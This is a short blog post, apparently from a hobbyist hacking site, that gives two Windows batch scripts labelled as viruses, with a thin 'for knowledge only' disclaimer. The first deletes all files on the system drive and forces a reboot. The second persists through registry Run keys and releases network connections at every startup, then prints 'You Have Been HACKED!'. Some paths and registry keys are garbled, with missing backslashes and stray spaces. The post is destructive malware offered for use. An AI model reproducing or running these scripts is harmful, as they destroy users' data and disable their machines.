This Virus Deletes All The Content Of A Drive
VIRUS
Note >> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept ....
>> This Virus Deletes All The Content Of A Drive...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code a .bat file
>> Disable Internet Permanently
Save As A bat File
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
Subscribe to:
Post Comments (Atom)
Post a Comment